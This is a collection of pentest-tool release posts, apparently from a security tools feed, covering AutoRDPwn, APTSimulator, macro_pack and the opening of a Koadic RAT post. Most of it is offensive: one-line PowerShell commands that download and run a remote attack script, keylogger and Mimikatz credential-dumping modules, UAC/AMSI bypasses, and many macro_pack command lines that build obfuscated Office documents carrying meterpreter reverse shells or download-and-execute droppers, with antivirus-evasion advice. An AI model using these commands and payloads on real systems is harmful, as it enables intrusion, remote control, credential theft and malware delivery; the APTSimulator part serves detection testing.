AutoRDPwn v5.0 – The Shadow Attack Framework

AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim’s desktop without his consent, and even control it on-demand, using tools native to the operating system itself.Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this, Through a completely intuitive menu in seven different languages.Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.RequirementsPowershell 4.0 or higherChangesVersion 5.0• New logo completely redesigned from scratch• Full translation in 7 languages: es, en, fr, de, it, ru, pt• Remote execution through a reverse shell with UAC and AMSI Bypass• Partial support from Linux (more information in the user guide)• Improved remote execution (internet connection is no longer necessary on the victim)• New section available: Backdoors and persistence• New module available: Remote Keylogger• New section available: Privilege escalation• New module available: Obtain information from the operating system• New module available: Search vulnerabilities with Sherlock• New module available: Escalate privileges with PowerUp• New section available: Other Modules• New module available: Execute an external script*The rest of the changes can be consulted in the CHANGELOG fileUseThis application can be used locally, remotely or to pivot between teams.When used remotely in a reverse shell, it is necessary to use the following parameters:-admin / -noadmin -> Depending on the permissions we have, we will use one or the other-nogui -> This will avoid loading the menu and some colors, guaranteed its functionality-lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)-option -> As with the menu, we can choose how to launch the attack-shadow -> We will decide if we want to see or control the remote device-createuser -> This parameter is optional, the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machineLocal execution on one line:powershell -ep bypass “cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"Example of remote execution on a line:powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaScreenshotsCredits and AcknowledgmentsThis framework uses the following scripts and tools:• Chachi-Enumerator of Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools• Get-System from HarmJ0y & Matt Graeber -> https://github.com/HarmJ0y/Misc-PowerShell• Invoke-DCOM of Steve Borosh -> https://github.com/rvrsh3ll/Misc-Powershell-Scripts• Invoke-MetasploitPayload of Jared Haight -> https://github.com/jaredhaight/Invoke-MetasploitPayload• Invoke-Phant0m of Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m• Invoke-PowerShellTcp of Nikhil "SamratAshok" Mittal -> https://github.com/samratashok/nishang• Invoke-TheHash by Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash• Mimikatz from Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz• PsExec from Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• RDP Wrapper of Stas’M Corp. -> https://github.com/stascorp/rdpwrap• SessionGopher of Brandon Arvanaghi -> https://github.com/Arvanaghi/SessionGopherAnd many more, that do not fit here .. Thanks to all of them and their excellent work.ContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/zJ75MJYF2V8/autordpwn-v50-shadow-attack-framework.html

AutoRDPwn v4.8 – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim’s desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.RequirementsPowershell 4.0 or higherChangesVersion 4.8• Compatibility with Powershell 4.0• Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.)• Automatic exclusion in Windows Defender (4 different methods)• Remote execution without password for PSexec, WMI and Invoke-Command• New available attack: DCOM Passwordless Execution• New available module: Remote Access / Metasploit Web Delivery• New module available: Remote VNC Server (designed for legacy environments)• Autocomplete the host, user and password fields by pressing Enter• It is now possible to run the tool without administrator privileges with the -noadmin parameter*The rest of the changes can be consulted in the CHANGELOG fileUseThis application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks.One line execution:powershell -ep bypass “cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaScreenshotsCredits and Acknowledgments• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• HarmJ0y & Matt Graeber for his script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell• Stas’M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0mContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://www.kitploit.com/2019/03/autordpwn-v48-shadow-attack-framework.html

AutoRDPwn v4.5 – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim’s desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.RequirementsPowershell 5.0 or higherChangesVersion 4.5• New ninja style icon!• Automatic cleaning of Powershell history after execution• Now all dependencies are downloaded from the same repository• Many errors and bugs fixed• UAC & AMSI bypass in 64-bit systems• New module available: Remote Desktop Caching• New module available: Disable system logs (Invoke-Phant0m)• New module available: Sticky Keys Hacking• New available module: Remote Desktop History• New available attack: Session Hijacking (passwordless)WARNING! This attack is very intrusive and can only be used locally*The rest of the changes can be consulted in the CHANGELOG fileUseThis application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords or even recover the history of RDP connections.One line execution:powershell -ep bypass “cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaScreenshotsCredits and Acknowledgments• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• HarmJ0y & Matt Graeber for his script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell• Stas’M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0mContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZHHxiH4qJi0/autordpwn-v45-shadow-attack-framework.html

AutoRDPwn – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim’s desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.RequirementsPowershell 5.0 or higherChangesVersion 4.0• Fixed a bug in the scheduled task to remove the user AutoRDPwn• The Scheluded Task attack has been replaced by Invoke-Command• It is now possible to choose the language of the application and launch the attack on English versions of Windows*The rest of the changes can be consulted in the CHANGELOG fileUseExecution in a line:powershell -ExecutionPolicy Bypass “cd $ env: TEMP; iwr https://goo.gl/HSkAXP -Outfile AutoRDPwn.ps1;. \ AutoRDPwn.ps1"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaCredits and Acknowledgments• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• Stas’M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap• Kevin Robertson for his tool Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatzContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/FJO5eg5Xcpk/autordpwn-shadow-attack-framework.html

APTSimulator – A toolset to make a system look as if it was the victim of an APT attack

APT Simulator is a Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised.Use CasesPOCs: Endpoint detection agents / compromise assessment toolsTest your security monitoring’s detection capabilitiesTest your SOCs response on a threat that isn’t EICAR or a port scanPrepare an environment for digital forensics classesMotivesCustomers tested our scanners in a POC and sent us a complaint that our scanners didn’t report on programs that they had installed on their test systems. They had installed an Nmap, dropped a PsExec.exe in the Downloads folder and placed on EICAR test virus on the user’s Desktop. That was the moment when I decided to build a tool that simulates a real threat in a more appropriate way.Why Batch?Because it’s simple: Everyone can read, modify or extend itIt runs on every Windows system without any prerequisitesIt is closest to a real attacker working on the command lineFocusThe focus of this tool is to simulate adversary activity, not malware.Getting StartedDownload the latest release from the “release" sectionExtract the package on a demo system (Password: apt)Start a cmd.exe as AdministratorNavigate to the extracted program folder and run APTSimulator.batAvoiding Early DetectionThe batch script extracts the tools and shells from an encrypted 7z archive at runtime. Do not download the master repo using the "download as ZIP" button. Instead use the official release from the release section.Extending the Test SetSince version 0.4 it is pretty easy to extend the test sets by adding a single .bat file to one of the test-set category folders.E.g. If you want to write a simple use case for "privilege escalation", that uses a tool named "privesc.exe", clone the repo and do the following:Add you tool to the toolset folderWrite a new batch script privesc-1.bat and add it to the ./test-sets/privilege-escalation folderRun build_pack.batAdd your test to the table and action list in the README.mdCreate a pull requestTool and File ExtractionIf you script includes a tool, web shell, auxiliary or output file, place them in the folders ./toolset or ./workfiles. Running the build script build_pack.bat will include them in the encrypted archives enc-toolset.7z and enc-files.7z.Extract a Tool%ZIP% e -p%PASS% %TOOLARCH% -aoa -o%APTDIR% toolset\tool.exe > NULExtract a File%ZIP% e -p%PASS% %FILEARCH% -aoa -o%APTDIR% workfile\tool-output.txt > NULDetectionThe following table shows the different test cases and the expected detection results.AV = AntivirusNIDS = Network Intrusion Detection SystemEDR = Endpoint Detection and ResponseSM = Security MonitoringCA = Compromise Assessment Test Case AV NIDS EDR SM CA Dumps (Pwdump, Dir Listing) X Recon Activity (Typical Commands) X X X DNS (Cache Injection) (X) X X X Eventlog (WCE entries) X X X Hosts File (AV/Win Update blocks) (X) X X Backdoor (StickyKey file/debugger) X X Obfuscation (RAR with JPG ext) (X) Web Shells (a good selection) X (X) X Ncat Alternative (Drop & Exec) X X X X Remote Execution Tool (Drop) (X) X Mimikatz (Drop & Exec) X X X X PsExec (Drop & Exec) X X X At Job Creation X X X RUN Key Entry Creation X X X System File in Susp Loc (Drop & Exec) X X X Guest User (Activation & Admin) X X X LSASS Dump (with Procdump) X X X C2 Requests (X) X X X Malicious User Agent (Malware, RATs) X X X Scheduled Task Creation X X X Nbtscan Discovery (Scan & Output) X X (X) X Test Cases1. Dumpsdrops pwdump output to the working dirdrops directory listing to the working dir2. ReconExecutes command used by attackers to get information about a target system3. DNSLooks up several well-known C2 addresses to cause DNS requests and get the addresses into the local DNS cache4. EventlogCreates Windwows Eventlog entries that look as if WCE had been executed5. HostsAdds entries to the local hosts file (update blocker, entries caused by malware)6. Sticky Key BackdoorTries to replace sethc.exe with cmd.exe (a backup file is created)Tries to register cmd.exe as debugger for sethc.exe7. ObfuscationDrops a cloaked RAR file with JPG extension8. Web ShellsCreates a standard web root directoryDrops standard web shells to that diretoryDrops GIF obfuscated web shell to that diretory9. Ncat AlternativeDrops a PowerShell Ncat alternative to the working directory10. Remote Execution ToolDrops a remote execution tool to the working directory11. MimikatzDumps mimikatz output to working directory (fallback if other executions fail)Run special version of mimikatz and dump output to working directoryRun Invoke-Mimikatz in memory (github download, reflection)12. PsExecDump a renamed version of PsExec to the working directoryRun PsExec to start a command line in LOCAL_SYSTEM context13. At JobCreates an at job that runs mimikatz and dumps credentials to file14. RUN KeyCreate a suspicious new RUN key entry that dumps "net user" output to a file15. System File Suspicious LocationDrops suspicious executable with system file name (svchost.exe) in %PUBLIC% folderRuns that suspicious program in %PUBLIC% folder16. Guest UserActivates Guest userAdds Guest user to the local administrators17. LSASS DUMPDumps LSASS process memory to a suspicious folder18. C2 RequestsUses Curl to access well-known C2 servers19. Malicious User AgentsUses malicious user agents to access web sites20. Scheduled Task CreationCreates a scheduled task that runs mimikatz and dumps the output to a file21. Nbtscan DiscoveryScanning 3 private IP address class-C subnets and dumping the output to the working directoryWarningThis repo contains tools and executables that can harm your system’s integrity and stability. Do only use them on non-productive test or demo systems.ScreenshotsAdvanced SolutionsThe CALDERA automated adversary emulation system https://github.com/mitre/calderaInfection Monkey – An automated pentest tool https://github.com/guardicore/monkeyFlightsim – A utility to generate malicious network traffic and evaluate controls https://github.com/alphasoc/flightsimIntegrated Projects / SoftwareMimikatzPowerSploitPowerCatPsExecProcDump7ZipcurlDownload APTSimulator

Link: http://feedproxy.google.com/~r/PentestTools/~3/rAND2a8X3zQ/aptsimulator-toolset-to-make-system.html

macro_pack – Tool Used To Automatize Obfuscation And Generation Of Ms Office Documents For Pentest, Demo, And Social Engineering Assessments

The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. This tool can be used for redteaming, pentests, demos, and social engineering assessments. macro_pack will simplify antimalware solutions bypass and automatize the process from vba generation to final Office document generation.It is very simple to use:No configurationEverything can be done using a single line of codeGeneration of majority of Office formats and VBS based formatsAdvanced VBA macro attacks as well as DDE attacksThe tool is compatible with payloads generated by popular pentest tools (Metasploit, Empire, …). It is also easy to combine with other tools as it is possible to read input from stdin and have a quiet output to another tool. This tool is written in Python3 and works on both Linux and Windows platform.Note: Windows platform with the right MS Office applications installed is required for Office documents automatic generation or trojan features.ObfuscationThe tool will use various obfuscation techniques, all automatic. Obfuscation feature is competible with all format that can be generated by macri_pack, VBA or VBS based.Basic obfuscation (-o option) includes:Renaming functionsRenaming variablesRemoving spacesRemoving commentsEncoding StringsNote that the main goal of macro_pack obfuscation is not to prevent reverse engineering, it is to prevent antivirus detection.GenerationMacro Pack can generate several kinds of MS office documents and scripts formats. The format will be automatically guessed depending on the given file extension. File generation is done using the option –generate or -G.Macro Pack pro version also allow to trojan existing files with option –trojan or -TMs Office Supported formats are:MS Word 97 (.doc)MS Word (.docm, .docx)MS Excel 97 (.xls)MS Excel (.xlsm)MS PowerPoint (.pptm)MS Visio 97 (.vsd)MS Visio (.vsdm)MS Project (.mpp)Scripting (txt) supported formats are:VBA text file (.vba)VBS text file (.vbs)Windows Script Host (.wsh)Windows Script Components scriptlets (.wsc, .sct)HTML Applications (.hta)Note that all scripting formats can be generated on Linux version of macro_pack as well.Ethical useThe macro_pack tool shall only be used by pentester, security researchers, or other people with learning purpose. I condamn all use of security tools for unethical actions (weather these ar legal or illegal). I know this will not prevent usage by malicious people and that is why all features are not publicly released.About pro mode…You may notice that not all part of macro_pack is available. Only the community version is available online. I fear the features in the pro version are really too much “weaponizing" the process and I do not want it available to all script kiddies out there. The pro mode includes features such as:Advance antimalware bypassVBOM security bypassSelf decoding VBAMS Office persistanceTrojan existing MS Office documentsLateral movement using DCOM objectsAnti-debug using http://seclists.org/fulldisclosure/2017/Mar/90For now I do not plan to release or sell this pro version however if you are really interrested I can share pro binary in the next case:You significally contribute to macro_pack on GitHub + I need to know your identityRun/InstallRun Windows binaryGet the latest binary from https://github.com/sevagas/macro_pack/releases/Download binary on PC with genuine Microsoft Office installed.Open console, CD to binary dir and call the binary, simple as that!macro_pack.exe –helpInstall from sourcesDownload and install dependencies:git clone https://github.com/sevagas/macro_pack.gitcd macro_packpip3 install -r requirements.txtNote: For windows, you also need to download manually pywin32 from https://sourceforge.net/projects/pywin32/files/pywin32/The tool is in python 3 so just start with with your python3 install. ex:python3 macro_pack.py –help# orpython macro_pack.py –help # if python3 is default installIf you want to produce a standalone exe using pyinstaller:Install PyCrypto at http://www.voidspace.org.uk/python/pycrypto-2.6.1/Double-click on the "build.bat" script on a Windows machine.The resulted macro_pack.exe will be inside the bin directory.Some examplesmacro_pack communityObfuscate the vba file generated by msfvenom and put result in a new vba file.msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vbaObfuscate Empire stager vba file and generate a MS Word document:macro_pack.exe -f empire.vba -o -G myDoc.docmGenerate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm" Create a word 97 document containing an obfuscated VBA reverse meterpreter payload inside a share folder:msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G \\REMOTE-PC\Share\meter.doc Download and execute Empire Launcher stager without powershell.exe by using DROPPER_PS template# 1 Generate a fiez containing Empire lauchcher # 2 Make that file available on web server, ex with netcat:{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat empire_stager.cmd; } | nc -l -p 6666 -q1# 3 Use macro\_pack to generate DROPPER_PS payload in Excel fileecho http://10.5.5.12:6543/empire_stager.cmd | macro_pack.exe -o -t DROPPER_PS -G join_the_empire.xls# 4 When executed on target, the macro will download PowerShdll, run it with rundll32, and download and execute stager.Execute calc.exe via Dynamic Data Exchange (DDE) attackecho calc.exe | macro_pack.exe –dde -G dde_test.docxDownload and execute file via powershell using Dynamic Data Exchange (DDE) attack# 1 Change the target file URL in resources\community\ps_dl_exec.cmd# 2 Embed download execute cmd in documentpython macro_pack.py –dde -f ..\resources\community\ps_dl_exec.cmd -G DDE.docGenerate obfuscated Meterpreter reverse TCP VBS file and run it# 1 Generate obfuscated VBS based on meterpreter templateecho <port> | macro_pack.exe -t METERPRETER -o -G meter.vbs# 2 On attacker machinge Setup meterpreter listenerOpen msfconsole:use exploit/multi/handlerset LHOST 0.0.0.0set PAYLOAD windows/meterpreter/reverse_tcpset AutoRunScript post/windows/manage/migrateset EXITFUNC threadset ExitOnSession falseset EnableUnicodeEncoding trueset EnableStageEncoding true# 3 run VBS file with wscript (run 32bit wscript because meterpreter payload is 32bit)%windir%\SysWoW64\wscript meter.vbsGenerated obfuscated HTA file which executes "systeminfo" and returns result to another macro_pack listening on 192.168.0.5# 1 Generate HTA file with CMD templateecho http://192.168.0.5:1234/a "systeminfo" | macro_pack.exe -t CMD -o -G info.hta# 2 On 192.168.0.5 open macro_pack as http listenermacro_pack.exe -l 1234# 3 run hta file with mshtamshta.exe full/path/to/info.htaGenerate obfuscated Meterpreter reverse https TCP SCT file and run it# 1 Generate obfuscated VBS scriptlet based on meterpreter reverse HTTPS templateecho <ip> <port> | macro_pack.exe -t WEBMETER -o -G meter.sct# 2 On attacker machinge Setup meterpreter listenerOpen msfconsole:use exploit/multi/handlerset PAYLOAD windows/x64/meterpreter/reverse_httpsset LHOST <attacker_ip> # NOTE this cannot be 0.0.0.0 for reverse httpsset LPORT <port>set AutoRunScript post/windows/manage/migrateset EXITFUNC threadset ExitOnSession falseset EnableUnicodeEncoding trueset EnableStageEncoding trueexploit -j# 3 run scriptlet with regsvr32 regsvr32 /u /n /s /i:meter.sct scrobj.dllmacro_pack proTrojan the existing shared "report.xlsm" file with a dropper. Use anti-AV and anti-debug features.echo "http://10.5.5.12/drop.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER2 –trojan –av-bypass –stealth -G "E:\accounting\report.xls" Genenerate a Word file containing VBA self encoded x64 reverse meterpreter VBA payload (will bypass most AV). Keep-alive is needed because we need meterpreter to stay alive before we migrate.msfvenom.bat -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o –vbom-encode –keep-alive -G out.docmTrojan a PowerPoint file with a reverse meterpreter. Macro is obfuscated and mangled to bypass most antiviruses.msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o –av-bypass –trojan -G hotpics.pptmExecute a macro on a remote PC using DCOMREM Step 1: Ensure you have enough rightsnet use \\192.168.0.8\c$ /user:domain\username passwordREM Step 2: Generate document, for example here, meterpreter reverse TCP Excel fileecho 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G meter.xlsmREM Step 3: Copy the document somewhere on remote sharecopy meter.xlsm "\\192.168.0.8\c$\users\username\meter.xlsm"REM Step 4: Execute!macro_pack.exe –dcom="\\192.168.0.8\c$\users\username\meter.xlsm"REM Step 2 to 4 in one step:echo 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G "\\192.168.0.8\c$\users\username\meter.xlsm" –dcom="\\192.168.0.8\c$\users\username\meter.xlsm"All available optionsGeneral options: -f, –input-file=INPUT_FILE_PATH A VBA macro file or file containing params for –template option If no input file is provided, input must be passed via stdin (using a pipe). -q, –quiet Do not display anything on screen, just process request. -o, –obfuscate Same as ‘–obfuscate-form –obfuscate-names –obfuscate-strings’ –obfuscate-form Modify readability by removing all spaces and comments in VBA –obfuscate-strings Randomly split strings and encode them –obfuscate-names Change functions, variables, and constants names -s, –start-function=START_FUNCTION Entry point of macro file Note that macro_pack will automatically detect AutoOpen, Workbook_Open, or Document_Open as the start function -t, –template=TEMPLATE_NAME Use VBA template already included in macro_pack.exe. Available templates are: HELLO, CMD, DROPPER, DROPPER2, DROPPER_PS, DROPPER_DLL, METERPRETER, EMBED_EXE Help for template usage: macro_pack.exe -t help -G, –generate=OUTPUT_FILE_PATH. Generates a file containing the macro. Will guess the format based on extension. Supported extensions are: vba, vbs, hta, doc, docm, xls, xlsm, pptm, vsd, vsdm. Note: Apart from vba which is a text files, all other requires Windows OS with right MS Office application installed. -e, –embed=EMBEDDED_FILE_PATH Will embed the given file in the body of the generated document. Use with EMBED_EXE template to auto drop and exec the file. –dde Dynamic Data Exchange attack mode. Input will be inserted as a cmd command and executed via DDE DDE attack mode is not compatible with VBA Macro related options. Usage: echo calc.exe | macro_pack.exe –dde -W DDE.docx Note: This option requires Windows OS with genuine MS Office installed. –run=FILE_PATH Open document using COM to run macro. Can be useful to bypass whitelisting situations. This will trigger AutoOpen/Workbook_Open automatically. If no auto start function, use –start-function option to indicate which macro to run. -l, –listen=PORT Open an HTTP server listening on defined port. -h, –help Displays help and exit Notes: If no output file is provided, the result will be displayed on stdout. Combine this with -q option to pipe only processed result into another program ex: macro_pack.exe -f my_vba.vba -o -q | another_app Another valid usage is: cat input_file.vba | macro_pack.exe -o -q > output_file.vbamacro_pack Pro only: –vbom-encode Use VBA self encoding to bypass antimalware detection and enable VBOM access (will exploit VBOM self activation vuln). –start-function option may be needed. –av-bypass Use various tricks efficient to bypass most av (combine with -o for best result) –keep-alive Use with –vbom-encode option. Ensure new app instance will stay alive even when macro has finished –persist Use with –vbom-encode option. Macro will automatically be persisted in application startup path (works with Excel documents only). The macro will then be executed anytime an Excel document is opened (even non-macro documents). -T, –trojan=OUTPUT_FILE_PATH Inject macro in an existing MS office file. Supported files are the same as for the -G option. Files will also be converted to approriate format, ex: pres.pptx will become pres.pptm If file does not exist, it will be created (like -G option) –stealth Anti-debug and hiding features –dcom=REMOTE_FILE_PATH Open remote document using DCOM for pivot/remote exec if psexec not possible for example. This will trigger AutoOpen/Workboo_Open automatically. If no auto start function, use –start-function option to indicate which macro to run.Template usageTemplates can be called using -t, –template=TEMPLATE_NAME combined with other options.Here are all the available templates.HELLOJust print a hello message and awareness about macroGive this template the name or email of the author-> Example: echo "@Author" | macro_pack.exe -t HELLO -G hello.pptmCMDExecute a command line and send result to remote http serverGive this template the server url and the command to run-> Example: echo "http://192.168.0.5:7777" "dir /Q C:" | macro_pack.exe -t CMD -o -G cmd.doc# Catch result with any webserver or netcatnc -l -p 7777DROPPERDownload and execute a file.Give this template the file url and the target file path-> Example: echo <file_to_drop_url> "<download_path>" | macro_pack.exe -t DROPPER -o -G dropper.xlsDROPPER2Download and execute a file. File attributes are also set to system, read-only, and hidden.Give this template the file url and the target file path.-> Example: echo <file_to_drop_url> "<download_path>" | macro_pack.exe -t DROPPER2 -o -G dropper.xlsmDROPPER_PSDownload and execute Powershell script using rundll32 (to bypass blocked powershell.exe).Note: This payload will download PowerShdll from Github.Give this template the url of the powershell script you want to run-> Example: echo "<powershell_script_url>" | macro_pack.exe -t DROPPER_PS -o -G powpow.docDROPPER_DLLDownload a DLL with another extension and run it using Office VBA-> Example, load meterpreter DLL using Office:REM Generate meterpreter dll payloadmsfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f dll -o meter.dllREM Make it available on webserver, ex using netcat on port 6666{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat meter.dll; } | nc -l -p 6666 -q1REM Create OFfice file which will download DLL and call itREM The DLL URL is http://192.168.0.5:6666/normal.html and it will be saved as .asd fileecho "http://192.168.0.5:6666/normal.html" Run | macro_pack.exe -t DROPPER_DLL -o -G meterdll.xlsMETERPRETERMeterpreter reverse TCP template using MacroMeter by Cn33liz.This template is CSharp Meterpreter Stager build by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw.Give this template the IP and PORT of listening mfsconsole-> Example: echo <ip> <port> | macro_pack.exe -t METERPRETER -o -G meter.docmRecommended msfconsole options (use exploit/multi/handler):set PAYLOAD windows/meterpreter/reverse_tcpset LHOST <ip>set LPORT <port>set AutoRunScript post/windows/manage/migrateset EXITFUNC threadset ExitOnSession falseset EnableUnicodeEncoding trueset EnableStageEncoding trueexploit -jWEBMETERMeterpreter reverse TCP template using VbsMeter by Cn33liz.This template is CSharp Meterpreter Stager build by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw.Give this template the IP and PORT of listening mfsconsole-> Example: echo <ip> <port> | macro_pack.exe -t WEBMETER -o -G meter.vsdRecommended msfconsole options (use exploit/multi/handler):set PAYLOAD windows/meterpreter/reverse_https (32bit)set PAYLOAD windows/x64/meterpreter/reverse_https (64bit)set AutoRunScript post/windows/manage/migrateset LHOST <ip>set LPORT <port>set EXITFUNC threadset ExitOnSession falseset EnableUnicodeEncoding trueset EnableStageEncoding trueexploit -jEMBED_EXECombine with –embed option, it will drop and execute (hidden) the embedded file.Optionaly you can give to the template the path where file should be extractedIf extraction path is not given, file will be extracted with random name in current path.-> Example1: macro_pack.exe -t EMBED_EXE –embed=%%windir%%\system32\calc.exe -o -G my_calc.vbs-> Example2: echo "path\\to\newcalc.exe" | macro_pack.exe -t EMBED_EXE –embed=%%windir%%\system32\calc.exe -o -G my_calc.docEfficiencyThe various features were tested against localy installed Antimalware solutions as well as online service. I ran multiple tests with several kind of payloads and macro_pack features. A majority of antivirus will be evaded by the simple "obfuscate" option. Features available in pro mode generally ensure full AV bypass.Example with Empire VBA stager:Here are the results of NoDistribute scanner for the regular Empire VBA stagerHere are the results with the macro_pack -o (–obfuscate) optionWarning: Do not submit your samples to online scanner (ex VirusTotal), Its the best way to break your stealth macro. I also suggest you do not submit to non reporting site such as NoDistribute. You cannot be sure what these sites will do with the data you submit. If you have an issue with macro_pack AV detection you can write to us for advice or submit an issue or pull request.Relevant resourcesBlog posts about MS Office security:http://blog.sevagas.com/?My-VBA-Bot (write a full VBA RAT, includes how to bypass VBOM protection)http://pwndizzle.blogspot.fr/2017/03/office-document-macros-ole-actions-dde.htmlhttps://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ (About Dynamic Data Exchange attacks)https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/https://labs.mwrinfosecurity.com/blog/dll-tricks-with-vba-to-improve-offensive-macro-capability/Other useful links:https://github.com/p3nt4/PowerShdll (Run PowerShell with dlls only)https://gist.github.com/vivami/03780dd512fec22f3a2bae49f9023384 (Run powershel script with PowerShdll VBA implementation)https://enigma0x3.net/2016/03/15/phishing-with-empire/ (Generate Empire VBA payload)https://github.com/EmpireProject/Empirehttps://medium.com/@vivami/phishing-between-the-app-whitelists-1b7dcdab4279https://www.metasploit.com/https://github.com/Cn33liz/MacroMeterhttps://github.com/khr0x40sh/MacroShopDownload macro_pack

Link: http://feedproxy.google.com/~r/PentestTools/~3/L18DQzXLRXo/macropack-tool-used-to-automatize.html

Koadic – COM Command & Control Framework (JScript RAT)

Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.It is possible to serve payloads completely in memory from stage 0 to beyond, as well as use cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).Koadic also attempts to be compatible with both Python 2 and Python 3.DemoHooks a zombieElevates integrity (UAC Bypass)Dumps SAM/SECURITY hive for passwordsScans local network for open SMBPivots to another machineStagersStagers hook target zombies and allow you to use implants. Module Description stager/js/mshta serves payloads in memory using MSHTA.exe HTML Applications stager/js/regsvr serves payloads in memory using regsvr32.exe COM+ scriptlets stager/js/rundll32_js serves payloads in memory using rundll32.exe stager/js/disk serves payloads using files on disk ImplantsImplants start jobs on zombies. Module Description implant/elevate/bypassuac_eventvwr 